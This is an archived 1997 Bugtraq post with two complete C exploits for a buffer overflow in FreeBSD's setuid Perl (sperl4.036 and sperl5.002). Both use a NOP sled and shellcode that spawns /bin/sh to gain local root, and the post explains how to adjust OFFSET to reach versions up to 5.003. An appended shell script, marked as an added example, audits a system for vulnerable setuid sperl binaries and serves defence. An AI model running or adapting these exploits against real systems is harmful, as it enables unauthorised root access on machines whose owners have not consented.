FreeBSD exploits for the Perl 5.003 (and earlier) overflow bug.

Summary
Description: Buffer overflow in Perl, already discussed in another entry. These are FreeBSD exploits for perl4.036 and 5.00X.
Author: Deliver <deliver@FREE.POLBOX.PL> wrote the exploits
Compromise: root (local)
Vulnerable Systems: FreeBSD with vulnerable perl (Version <= 5.003) installed.
Date: 21 April 1997
Details


Date: Mon, 21 Apr 1997 16:34:41 PDT
From: Deliver <deliver@FREE.POLBOX.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Exploits for FreeBSD sperl4.036 & sperl5.00x

  If somebody wants to test perl5.00X or perl4.036 buffer overflow exploits,
there are two for FreeBSD...

  The first works on perl4.036 and the second on perl5.002 ...
With a little modification of the OFFSET value you can overflow all versions up
to perl5.003

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0+1;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768+1);
        memcpy(&buf[768+1],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/*   Exploit for FreeBSD sperl5.00X by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          1000

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768);
        memcpy(&buf[768],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
}
------------cut-------------cut-------------cut------------cut------------

PS: Greetings to all Polish hackers ...
//////////////////////////////////////////////////////////////////////////
// ANY QUESTIONS ?                                                      //
// OVX - deliver@free.polbox.pl                                         //
//////////////////////////////////////////////////////////////////////////
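
A defender-side check for the condition both exploits depend on: a setuid sperl binary of version 5.003 or earlier. This is an added example, not part of the original post; the function names are hypothetical, and it assumes the version is encoded in the file name, as in the paths the exploits call (/usr/bin/sperl4.036, /usr/bin/sperl5.002).

```shell
#!/bin/sh
# Added example, not part of the original post. Function names are hypothetical.
# Assumption: the perl version is encoded in the file name, as in the paths
# the exploits above call (/usr/bin/sperl4.036, /usr/bin/sperl5.002).

# classify_sperl NAME -> prints "affected" (<= 5.003), "newer" or "unknown".
classify_sperl() {
    ver=${1#sperl}
    case $ver in
        [0-9]*.[0-9]*) ;;                 # looks like a version number
        *) echo unknown; return 0 ;;      # e.g. "suidperl": inspect by hand
    esac
    if awk -v v="$ver" 'BEGIN { exit !(v + 0 <= 5.003) }'; then
        echo affected
    else
        echo newer
    fi
}

# audit_sperl DIR... -> one "<status> <path>" line per setuid sperl binary.
# Files without the setuid bit are skipped: overflowing them gains no privilege.
audit_sperl() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f \( -name 'sperl*' -o -name 'suidperl*' \) \
            -perm -4000 -print 2>/dev/null |
        while IFS= read -r path; do
            echo "$(classify_sperl "${path##*/}") $path"
        done
    done
}

# Usage: sh audit_sperl.sh /usr/bin /usr/local/bin
# For each "affected" line, upgrade perl or clear the bit: chmod u-s <path>
if [ "$#" -gt 0 ]; then
    audit_sperl "$@"
fi
```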

This page is part of Fyodor's exploit world.